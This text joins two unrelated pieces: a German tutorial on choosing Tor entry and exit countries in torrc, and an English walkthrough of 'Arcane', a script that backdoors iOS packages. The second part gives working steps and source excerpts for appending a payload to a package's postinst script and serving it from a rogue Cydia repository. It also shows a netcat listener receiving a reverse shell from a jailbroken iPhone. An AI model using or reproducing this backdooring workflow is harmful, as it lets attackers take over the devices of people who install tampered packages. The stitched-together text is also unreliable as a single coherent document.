Im Tor Browser ein bestimmtes Land einstellen

In diesem Tutorial zeigen ich dir, wie du ein benutzerdefiniertes Entry- und Exit-Land im Tor-Browser für Computer einstellst. Dadurch verwendet Tor bestimmte Server in anderen Ländern, so dass du Web-Einschränkungen in deiner eigenen Region umgehen kannst. Denke daran, dass nicht alle Länder dir die Nutzung von Tor erlauben, was bedeutet, dass bestimmte Länder bei den Entry- und Exit-Optionen nicht funktionieren.

Methode1Unter Windows

  1. Stelle sicher, dass du Tor mindestens einmal ausgeführt hast. Damit die „torrc“-Datei — die Datei, die die Präferenz für den Exit-Knoten von Tor bestimmt — angezeigt wird, musst du Tor mindestens einmal auf deinem Computer ausführen.
    • Du kannst dafür einfach einen Doppelklick auf das Tor-Icon machen und dann auf Verbinden klicken.
  2. Öffne den Tor-Ordner. Gehe zu dem Ordner, in dem du Tor installiert hast, und mache dann zum Öffnen einen Doppelklick darauf.
  3. Finde die „torrc“ Datei. Du kannst so im Installationsordner von Tor an die Stelle navigieren, an der sich die Datei „torrc“ befindet:
    • Mache einen Doppelklick auf den Ordner Browser.
    • Mache einen Doppelklick auf den Ordner TorBrowser.
    • Mache einen Doppelklick auf den Ordner Daten.
    • Mache einen Doppelklick auf den Ordner Tor.
  4. Öffne „torrc“ mit Notepad. Mache einen Doppelklick auf die „torrc“ Datei, klicke im sich öffnenden Fenster „Öffnen mit“ auf Notepad und klicke dann auf Öffnen. Dies ermöglicht dir, den Text der Datei zu ändern.
  5. Füge die Zeile „EntryNodes“ hinzu. Setze den Cursor unter die letzte Textzeile im Dokument und tippe dann EntryNodes {} StrictNodes 1 ein und drücke auf ↵ Enter.[1]
  6. Füge die Zeile „ExitNodes“ hinzu. Tippe ExitNodes {} StrictNodes 1 ein und drücke auf ↵ Enter.
  7. Finde die Codes für dein Entry- und Exit-Land. Gehe auf deinem Computer im Browser auf https://web.archive.org/web/20180328074444/http://www.b3rn3d.com/blog/2014/03/05/tor-country-codes, scrolle nach unten zur Überschrift „Liste der Ländercodes für Tor“ und suche nach den Codes für die Länder, die du als Entry- und Exit-Knoten nutzen möchtest.
    • Wenn du bspw. möchtest, dass deine Internet-Session mit Tor in Kanada beginnt und in Uganda endet, würdest du den Ländercode von Kanada „Canada“ (ca) und „Uganda“ (ug) suchen.
  8. Gib die Entry- und Exit-Ländercodes ein. Tippe den Code für das Land, in dem deine Sitzung beginnen soll, zwischen die {} Klammern rechts neben der Zeile „EntryNodes“ ein, wiederhole dies dann mit dem Exit-Land und der Zeile „ExitNodes“. Um bspw. in Kanada zu beginnen und in Uganda zu enden, würden deine Zeilen so aussehen:
    • EntryNodes {ca} StrictNodes1
    • ExitNodes {ug} StrictNodes1
  9. Erwäge das Deaktivieren von „strict nodes“. Du kannst dafür StrictNodes 1 durch StrictNodes 0 ersetzen, was sicherstellt, dass Tor noch andere Ländercodes nutzen kann, wenn die angegebenen nicht funktionieren.
  10. Füge einem „strict node“ mehrere Länderoptionen hinzu. Wenn du die strict nodes für dein Entry- und/oder Exit-Land beibehalten möchtest, dann erwäge das Hinzufügen von mehreren Ländercodes, statt nur ein Land zu verwenden. Du kannst Länder hinzufügen, indem du weitere Ländercodes in die Klammern einfügst. Trenne die einzelnen Einträge dabei mit Kommas. Um bspw. der Zeile mit „ExitNodes“ in Uganda die Länder USA und Frankreich hinzuzufügen, würde deine Zeile so aussehen:
    • ExitNodes {ug},{us},{fr} StrictNodes 1
      • Achte darauf, dass sich zwischen den Ländern in Klammern kein Leerzeichen befindet.
  11. Ersetze die ursprüngliche „torrc“ Datei durch die gerade aktualisierte. Dies stellt sicher, dass die Ländereinstellungen für deinen Tor-Browser gespeichert sind:
    • Klicke auf Datei
    • Klicke auf Speichern als
    • Klicke auf das Dropdown-Feld „Speichern als Typ“ und klicke dann auf Alle Dateien
    • Klicke im Hauptfenster zur Auswahl auf die Datei „torrc“
    • Klicke auf Speichern
    • Klicke auf Ja
  12. Öffne Tor. Es kann sein, dass Tor dieses Mal geringfügig länger braucht zum Starten, vor allem wenn du ein weit entferntes Land gewählt hast.
  13. Überprüfe die Entry- und Exit-Knoten deines Circuits. Gehe in Tor auf eine beliebige Website, bspw. auf https://www.google.com/ und klicke dann auf das zwiebelförmige Icon links oben auf der Seite. Ein Dropdown-Menü mit der Überschrift „Tor-Circuit für diese Seite“ wird angezeigt, mit deinem Browser, dem Entry-Knoten, den Verbindungen in der Mitte, dem Exit-Knoten und dem Internet, von oben nach unten.
    • Im Beispiel dieser Methode würdest du dies sehen: Dieser Browser > Kanada [IP-Adresse] > [Land] [IP-Addresse] > Uganda [IP-Adresse] > Internet.

How to Embed Payloads into iPhone Packages with Arcane

It’s a common misconception that iPhones are impervious to cyberattacks and „more secure“ than Android. And when an iPhone does get hacked, it’s nearly impossible to tell that it happened.

Vulnerabilities in iOS are common, and Apple tries to tackle them with each security update it releases. To get started, consider all of the CVEs disclosed in the last year. That we know of, Apple issued over 180 patches so far in 2020, and likely a lot more that weren’t reported.

How to Hack into an iPhone?

Jailbreaks released over the last decade use an extensive range of iOS exploits. Government agencies use undisclosed exploits to compromise iPhone’s every day. And exploit acquisition platforms like Zerodium offers up to $2 million for private iOS vulnerability disclosures.

With that said, this article will not demonstrate a magic easy button for gaining access to anyone’s iPhone. It will give readers an idea of what’s possible with remote access to an iPhone and why it’s dangerous to use jailbreak repositories.

Step 1Jailbreak an iPhone

To follow this guide, a jailbroken iOS device is required. I’m testing this attack against an iPhone 7 Plus with iOS 13.4.1, as well as an iPhone 7 with iOS 13.5. Jailbreaking the iOS devices was accomplished using the unc0ver method. You could try alternative jailbreaks as well, such as Checkra1n.

Step 2Clone the Arcane Repository

Arcane is a simple automation script designed to backdoor iOS packages and create the necessary resources to host Cydia repositories. I created Arcane for this article to make the process quick and accessible to beginners. Before cloning the repository, ensure the required dependencies are installed and up to date.

~$ sudo apt-get update && sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils git python3

[sudo] password for kali:
Get:1 http://kali.download/kali kali-rolling InRelease [30.5 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 Packages [16.7 MB]
Get:3 http://kali.download/kali kali-rolling/non-free amd64 Packages [197 kB]
Get:4 http://kali.download/kali kali-rolling/contrib amd64 Packages [96.4 kB]
Fetched 17.0 MB in 4s (3,928 kB/s)
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
coreutils is already the newest version (8.30-3+b1).
dpkg is already the newest version (1.19.7kali1).
python3 is already the newest version (3.8.2-3).
python3 set to manually installed.
The following additional packages will be installed:
   git-man (1:2.27.0-1)
   libbz2-1.0 (1.0.8-3)
Suggested packages:
   bzip2-doc (1.0.8-3)
   git-daemon-run (1:2.27.0-1)
   | git-daemon-sysvinit (1:2.27.0-1)
   git-doc (1:2.27.0-1)
   git-el (1:2.27.0-1)
   git-email (1:2.27.0-1)
   git-gui (1:2.27.0-1)
   gitk (1:2.27.0-1)
   gitweb (1:2.27.0-1)
   git-cvs (1:2.27.0-1)
   git-mediawiki (1:2.27.0-1)
   git-svn (1:2.27.0-1)
The following packages will be upgraded:
   bzip2 (1.0.8-2 => 1.0.8-3)
   git (1:2.26.2-1 => 1:2.27.0-1)
   git-man (1:2.26.2-1 => 1:2.27.0-1)
   libbz2-1.0 (1.0.8-2 => 1.0.8-3)
   netcat-traditional (1.10-41.1+b1 => 1.10-45)
5 upgraded, 0 newly installed, 0 to remove and 767 not upgraded.
Need to get 8,643 kB of archives.
After this operation, 2,424 kB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 bzip2 amd64 1.0.8-3 [49.2 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 libbz2-1.0 amd64 1.0.8-3 [45.7 kB]
Get:3 http://kali.download/kali kali-rolling/main amd64 netcat-traditional amd64 1.10-45 [67.5 kB]
Get:4 http://kali.download/kali kali-rolling/main amd64 git amd64 1:2.27.0-1 [6,707 kB]
Get:5 http://kali.download/kali kali-rolling/main amd64 git-man all 1:2.27.0-1 [1,774 kB]
Fetched 8,643 kB in 2s (4,982 kB/s)
apt-listchanges: Reading changelogs...
(Reading database ... 287092 files and directories currently installed.)
Preparing to unpack .../bzip2_1.0.8-3_amd64.deb ...
Unpacking bzip2 (1.0.8-3) over (1.0.8-2) ...
Preparing to unpack .../libbz2-1.0_1.0.8-3_amd64.deb ...
Unpacking libbz2-1.0:amd64 (1.0.8-3) over (1.0.8-2) ...
Setting up libbz2-1.0:amd64 (1.0.8-3) ...
(Reading database ... 287092 files and directories currently installed.)
Preparing to unpack .../netcat-traditional_1.10-45_amd64.deb ...
Unpacking netcat-traditional (1.10-45) over (1.10-41.1+b1) ...
Preparing to unpack .../git_1%3a2.27.0-1_amd64.deb ...
Unpacking git (1:2.27.0-1) over (1:2.26.2-1) ...
Preparing to unpack .../git-man_1%3a2.27.0-1_all.deb ...
Unpacking git-man (1:2.27.0-1) over (1:2.26.2-1) ...
Setting up netcat-traditional (1.10-45) ...
Setting up bzip2 (1.0.8-3) ...
Setting up git-man (1:2.27.0-1) ...
Setting up git (1:2.27.0-1) ...
Processing triggers for libc-bin (2.30-4) ...
Processing triggers for man-db (2.9.1-1) ...
Processing triggers for kali-menu (2020.2.2) ...

When that’s done, clone the Arcane repository.

~$ sudo git clone https://github.com/tokyoneon/Arcane /opt/arcane

Cloning into '/opt/arcane'...
remote: Enumerating objects: 16, done.
remote: Counting objects: 100% (16/16), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 16 (delta 0), reused 16 (delta 0), pack-reused 0
Unpacking objects: 100% (16/16), 805.04 KiB | 2.95 MiB/s, done.

Recursively (-R) modify the ownership to make the files accessible without root privileges.

~$ sudo chown $USER:$USER -R /opt/arcane/

Change into the new /opt/arcane directory.

~$ cd /opt/arcane/

Elevate the permissions of the arcane.sh script to allow execution in Kali.

~/opt/arcane$ sudo chmod +x arcane.sh

To view the available options, execute Arcane with the –help argument.

~/opt/arcane$ ./arcane.sh --help

[░] ./arcane.sh --input package.deb --lhost <attacker ip> --lport <1337>

  -i, --input   iOS package to backdoor
  -f, --file    file containing commands to exec (default: not required)
  -h, --lhost   local ip address for nc listener
  -p, --lport   local port for netcat listener (default: 1337)
  -c, --cydia   generate resources for apt/cydia repository (default: disabled)
  -n, --netcat  autostart netcat listener (default: disabled)
  -u, --udp     enable udp (default: tcp)
  -x, --noart   if you hate awesome ascii art (default: enabled)
      --help    you're looking at it

Step 3Backdoor an iOS Package

There’s a „samples/“ directory included in the Arcane repository that contains different packages compiled for the iOS architecture. Use the ls command to view the directory contents.

~/opt/arcane$ ls -la samples/

total 400
drwxr-xr-x 2 root root   4096 Aug  4 11:32 .
drwxr-xr-x 5 root root   4096 Aug  4 11:32 ..
-rw-r--r-- 1 root root 100748 Aug  4 11:32 libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
-rw-r--r-- 1 root root 142520 Aug  4 11:32 network-cmds_543-1_iphoneos-arm.deb
-rw-r--r-- 1 root root  76688 Aug  4 11:32 sed_4.5-1_iphoneos-arm.deb
-rw-r--r-- 1 root root  60866 Aug  4 11:32 top_39-2_iphoneos-arm.deb
-rw-r--r-- 1 root root  13810 Aug  4 11:32 whois_5.3.2-1_iphoneos-arm.deb

Pulled from the official Bingner Cydia repo, all of the packages are usable when following along. For a complete list of available packages, use the below command to view the repository contents.

~/opt/arcane$ wget -qO- 'https://apt.bingner.com/dists/ios/1443.00/main/binary-iphoneos-arm/Packages'| awk -v i='https://apt.bingner.com/' '/debs\//{print i $2}'

https://apt.bingner.com/debs/1443.00/3proxy_0.5.3k-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/adv-cmds_119-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/afpfs-ng_0.8.1-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/apr_1.6.3-4_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/apr-lib_1.6.3-1_iphoneos-arm.deb
...
https://apt.bingner.com/debs/1443.00/xt_1.1.5-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/xtrans_1.3.5-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/xz_5.2.4-4_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/zip_2.32-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/zsh_5.7.1-3_iphoneos-arm.deb

Simply wget the package of your choosing. This walkthrough will use a package found in the „samples/“ directory. Use the following arcane command to backdoor the package.

~/opt/arcane$ ./arcane.sh --input samples/whois_5.3.2-1_iphoneos-arm.deb --lhost 172.16.16.1 --lport 20001 --cydia --netcat

  ░█████╗░██████╗░░█████╗░░█████╗░███╗░░██╗███████╗
  ██╔══██╗██╔══██╗██╔══██╗██╔══██╗████╗░██║██╔════╝
  ███████║██████╔╝██║░░╚═╝███████║██╔██╗██║█████╗░░
  ██╔══██║██╔══██╗██║░░██╗██╔══██║██║╚████║██╔══╝░░
  ██║░░██║██║░░██║╚█████╔╝██║░░██║██║░╚███║███████╗
  ╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚═╝░░╚══╝╚══════╝
                 v0.1 by @tokyoneon_

Below is a brief description of each argument, and you can watch the GIF below to see a package in action.

  • –input: This argument defines the file path to the desired package to backdoor.
  • –lhost: Defined as the attacker’s IP address, the lhost (or localhost) is a required argument. It tells the backdoored package where Kali is on the network. In this case, my Kali system is on 172.16.16.1.
  • –lport: Defined as an arbitrary value of 20001, the lport (or local port) tells the backdoored package where the Netcat listening port is.
  • –cydia: This argument instructs Arcane to generate the necessary files to host a Cydia repository.
  • –netcat: This argument tells Arcane to automatically start a Netcat listener with the given protocol and port.

When completed, the Arcane terminal will not be usable as the Netcat listener is waiting for an inbound connection.

Step 4Host the Repository Resources

Open a new terminal in Kali and view the contents of the /tmp/cydia directory. Notice the backdoored package.

~$ ls -la /tmp/cydia/

-rw-r--r--  1 root root    29 Jul 29 14:44 index.html
-rw-r--r--  1 root root   639 Jul 29 14:44 Packages
-rw-r--r--  1 root root   494 Jul 29 14:44 Packages.bz2
-rw-r--r--  1 root root   143 Jul 29 14:44 Release
-rw-r--r--  1 root root 14064 Jul 29 14:44 whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb

Change into the directory and start a simple python3 server to make the files accessible to other devices (i.e., an iPhone) on the same network.

~$ cd /tmp/cydia; sudo python3 -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Step 5Add the Repository to Cydia

Ensure the jailbroken iOS device and Kali system are on the same Wi-Fi network. Then, open the Cydia app and navigate to the „Sources“ tab. Select the „Edit“ button in the top right, then the „Add“ button in the top left.

When prompted for a URL, enter the IP address to the Kali system hosting the Python server. Be sure to remove the httpS in the URL as Cydia will try to add it by default. Select „Add Source“ to add it as a repository. Finally, select „Return to Cydia“ to find the newly added repository.

Step 6Install the Backdoored Package

Select the repository to find the backdoored package. Ensure the Arcane terminal is still listening in Kali, then select „Install“ and „Confirm“ in Cydia. Cydia will install the package and execute the embedded payload.

How Arcane Works

In the Arcane terminal, a successful command execution will produce an „arcane>“ shell prompt. Use sw_vers and uname to view the OS and kernel versions.

[░] /usr/bin/nc -v -l -p 20001
[░] starting netcat listener on port 20001 with tcp
listening on [any] 20001 ...
172.16.16.25: inverse host lookup failed: Unknown host
connect to [172.16.16.1] from (UNKNOWN) [172.16.16.25] 56050

arcane> sw_vers
ProductName:    iPhone OS
ProductVersion: 13.4.1
BuildVersion:   17E262
arcane> uname -a
Darwin iPhone 19.4.0 Darwin Kernel Version 19.4.0: Mon Feb 24 22:04:12 PST 2020; root:xnu-6153.102.3~1/RELEASE_ARM64_T8010 iPhone9,4 arm64 D111AP Darwin
arcane>

At this point, various post-exploitation attacks are possible, but let’s talk about what Arcane did. A few things happen in the GIF shown in step 3.

In Kali, decompress the whois package just installed on the iOS device.

~$ dpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decomp

Use tree to view the directory contents. Notice the „DEBIAN“ directory containing a „control“ and „postinst“ file. Both files are significant to how Cydia indexes packages and how commands are executed during installations.

~$ tree /tmp/whois-decomp/

/tmp/whois-decomp/
├── DEBIAN
│   ├── control
│   └── postinst
└── usr
    └── bin
        └── whois

The „control“ file (aka „control data“) contains values that package management tools like dpkg use when installing packages. Arcane will either modify an existing control file or create it.

# The "control" file template. Most iOS packages will include a
# control file. In the event one is not found, Arcane will use the
# below template. The `$hacker` variable is used here to occupy
# various arbitrary fields.
# https://www.debian.org/doc/manuals/maint-guide/dreq.en.html
controlTemp="Package: com.$hacker.backdoor
Name: $hacker backdoor
Version: 1337
Section: app
Architecture: iphoneos-arm
Description: A backdoored iOS package
Author: $hacker <https://$hacker.github.io/>
Maintainer: $hacker <https://$hacker.github.io/>";

...

# An `if` statement to check for the control file.
if [[ ! -f "$tmp/DEBIAN/control" ]]; then
    # If no control is detected, create it using the template.
    echo "$controlTemp" > "$tmp/DEBIAN/control";
    status "created control file" "error with control template";
else
    # If a control file exists, Arcane will simply rename the package
    # as it appears in the list of available Cydia applications. This
    # makes the package easier to location in Cydia.
    msg "detected control file" succ;
    sed -i '0,/^Name:.*/s//Name: $hacker backdoor/' "$tmp/DEBIAN/control";
    status "modified control file" "error with control";
fi;

It’s possible to supply scripts as part of a package when installing, upgrading, or removing applications. Package maintainer scripts include the preinst, postinst, prerm, and postrm files. Arcane takes advantage of the „postinst“ file to execute commands during the installation.

# The "post-installation" file. This file is generally responsible
# for executing commands on the OS after installing the required
# files. It's utilized by developers to manage and maintain various
# aspects of an installation. Arcane abuses this functionality by
# appending malicious Bash commands to the bottom of the file.
postinst="$tmp/DEBIAN/postinst";

# A function to handle the type of command execution embedded into the
# postinst file.
function inject_backdoor ()
{
    # If --file is used, `cat` the command(s) into the postinst file.
    if [[ "$infile" ]]; then
        cat "$infile" >> "$postinst";
        embed="[$infile]";
    else
        # If no --file, utilize the simple Bash payload, previously
        # defined.
        echo -e "$payload" >> "$postinst";
        embed="generic shell command";
    fi;
    status "embedded $embed into postinst" "error embedding backdoor";
    chmod 0755 "$postinst"
};

Readers are encouraged to review the Arcane source to better understand the underlining commands.

iOS Post-Exploitation Attacks

Apple’s iOS and macOS are similar; both operating systems are derivatives of FreeBSD, and there’s overlap in how the systems are set up, such as with launchctl, the keychain, and the filesystem structure.

However, readers will immediately notice wget, ifconfig, curl, netstat, and other familiar commands are not available since iOS does not have these binaries installed by default. Stay tuned to Null Byte for more, where I’ll discuss workarounds for missing commands and post-exploitation attacks in more detail.

Follow me on Twitter @tokyoneon_ and GitHub to keep up with my current projects. And for questions and concerns, leave a comment or ping me on Twitter.